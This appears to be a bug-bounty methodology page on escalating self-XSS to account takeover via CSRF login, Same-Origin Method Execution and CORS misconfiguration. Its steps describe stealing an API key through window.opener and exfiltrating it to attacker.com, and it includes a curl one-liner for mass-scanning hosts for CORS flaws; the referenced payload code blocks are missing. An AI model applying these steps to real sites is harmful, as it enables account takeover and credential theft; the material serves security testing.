search
githubEdit

Self-XSS Bypass

hashtag
CSRF In Login

  • Search for csrf in login and now attacker force the victim to login ton his account be affected with the js execution

hashtag
fetchLater()

hashtag
SOME (Same-Origin Method Execution)

LogoDQL Injection & SOME Attackmushroom.catchevron-right

hashtag
Bypass Self-XSS via SOME: Short Steps w/ Code Blocks

Setup: Self-XSS in profile (e.g., dashboard). Victim (bot/admin) visits your link. Goal: Leak sensitive data (e.g., API key from /api/me) via window.opener chain. Host exploit on attacker.com.

Step 1: Confirm Self-XSS

Inject in profile name:

Triggers only on your dashboard → Vulnerable to escalation.

Step 2: Build Parent Page A (exploit.html on attacker.com)

Opens child (your XSS page), redirects to sensitive endpoint.

Step 3: Build Child Payload B (Inject in self-XSS)

Waits for parent load, CSRF login (to your acct), steals via opener. Add 100-200ms delay.

Step 4: Deliver & Trigger

  • Victim visits attacker.com/exploit.html.

  • Flow: A opens B (XSS fires) → A loads /api/me → B steals & exfils (base64 via btoa).

Step 5: Handle Multi-Step (e.g., Confirmations)

Spawn extra window (Window 3) for chaining clicks:

Tips: Same-origin only. Use Burp/SOMEtime plugin to scan JSONP callbacks. Mitigate: Static callbacks, no JSONP.

hashtag
CORS + Self-XSS to ATO Checklist

  1. Got Self-XSS?: Confirm self-XSS vulnerability.

  2. Check CORS Misconfig: Run cat corstexturl.txt | CorsMe or cat corstexturl.txt | soru -u | anew | while read host; do curl -s --path-as-is --insecure -H "Origin: test.com" "$host" | grep -qs "Access-control-allow-origin: test.com" && echo "$host \033[0;31m cors Vulnerable"; done.

  3. Exploit CORS: Replace XSS payload with:

hashtag
References

PreviousXSS-HTML InjectionNextImproper Authentication

Last updated